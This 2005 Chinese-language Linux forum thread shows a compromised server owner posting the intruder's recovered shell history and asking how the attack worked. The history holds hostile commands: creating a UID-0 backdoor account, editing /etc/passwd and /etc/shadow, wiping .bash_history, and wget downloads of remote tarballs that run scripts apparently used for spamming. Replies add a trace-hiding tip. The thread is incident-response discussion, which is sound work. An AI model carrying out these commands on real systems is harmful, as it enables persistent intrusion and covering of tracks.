LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
查看: 3534|回复: 31

服务器被黑,请高手指点是用什么方法黑的

[复制链接]
发表于 2005-12-7 15:52:12 | 显示全部楼层 |阅读模式
今早发现服务器起不来了,使用恢复盘启动后发现命令历史中有下面这些东西,请高手指点到底是怎么被黑的,用的是什么工具,以及如何清除?

cd /usr/share/.a
./mig -u root -n 0
useradd -o -u 0 -g 0 -d /var/log/lib lib
passwd lib
vi /etc/passwd
mv /etc/passwd /etc/passwd-
cp /etc/passwd- /etc/passwd
vi /etc/shadow
mv /etc/shadow /etc/shadow-
cp /etc/shadow- /etc/shadow
w
ls -al
cd /root
rm -rf .bash_history
exit
bash
cd /usr/share/.a
ls -al
rm -rf spp6/
wget www.geocities.com/adasadaa/sp1.tgz
ftp ftp.geocities.com
tar zxvf sp1.tgz
rm -rf sp1.tgz
cd sp1/
ls -al
cat list.txt
php mib.php
cd ..
rm -rf sp1/
ftp ftp.geocities.com
tar zxvf sp1.tgz
cd sp1
php mib.php
service sendmail restart
service sendmail start
ls-al
ls -al
cd ..
rm -rf sp1
ftp ftp.geocities.com
tar zxvf ps1.tgz
rm -rf ps1.tgz
cd s
cd sp
cd sp1
ls -al
php mib.php
ls -al
rm -rf list.txt
cat >> list.txt
vi list.txt
php mib.php
ps -ax
ps -ax
mail
mail ssolicss@yahoo.com
ps -ax
ps -ax
ps -ax
ps -ax
cd ..
wget www.geocities.com/adasadaa/ps2.tgz; tar zxvf ps2.tgz; rm -rf ps2.tgz; cd sp2; rm -rf list.txt
ftp ftp.geocities.com
ls -al
rm -rf ps1* sp1*
tar zxvf sp2.tgz
mv 2.txt sp2/
cd sp2/
ls -al
ls -al
rm -rf list.txt
mv 2.txt list.txt
perl perl.pl &
ls -la
发表于 2005-12-8 14:37:34 | 显示全部楼层
系统还能修复正常起来吗,接入网上来,让兄弟们连到你的服务器上瞧瞧。
回复 支持 反对

使用道具 举报

发表于 2005-12-8 16:20:46 | 显示全部楼层
这个人不怎么精,手法还比较嫩.
回复 支持 反对

使用道具 举报

发表于 2005-12-8 16:39:20 | 显示全部楼层
嫩的很,估计是进入系统后太兴奋了,竟然先删了.bash_history,而后又没有kill -9 0 销毁踪迹! 在输入的时候竟然有键入错误!
另:
   最好告诉我们你的系统版本,kernel版本,打开了什么服务器,是否有防火墙规则,否则谁知道呢?
回复 支持 反对

使用道具 举报

发表于 2005-12-8 18:11:07 | 显示全部楼层
最好马上把user name&password&ip address都发到我的邮箱.否则谁知道呢?
回复 支持 反对

使用道具 举报

发表于 2005-12-8 18:27:32 | 显示全部楼层
Post by Yuri
最好马上把user name&password&ip address都发到我的邮箱.否则谁知道呢?


Yuri兄搞笑了!
回复 支持 反对

使用道具 举报

 楼主| 发表于 2005-12-8 19:33:51 | 显示全部楼层
谢谢大家关心!
我很早以前装的rh9,系统已经起不来了,那个家伙替换了很多系统工具。后来覆盖安装一遍系统,凑合着起来了。发现多出一个lib用户,uid与gid都是0,相当于克隆了root。
现在还不知道是通过什么漏洞登上来的。哪位有相关经验可以介绍一下。
回复 支持 反对

使用道具 举报

发表于 2005-12-8 19:55:38 | 显示全部楼层
apache的ssl + openssh
老洞了!
回复 支持 反对

使用道具 举报

 楼主| 发表于 2005-12-8 22:48:51 | 显示全部楼层
kissingwolf兄能不能详细的介绍一下,或者给个连接也行。
回复 支持 反对

使用道具 举报

发表于 2005-12-8 23:21:21 | 显示全部楼层
这个人看起来正在试图用脚本调用sendmail发垃圾邮件
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表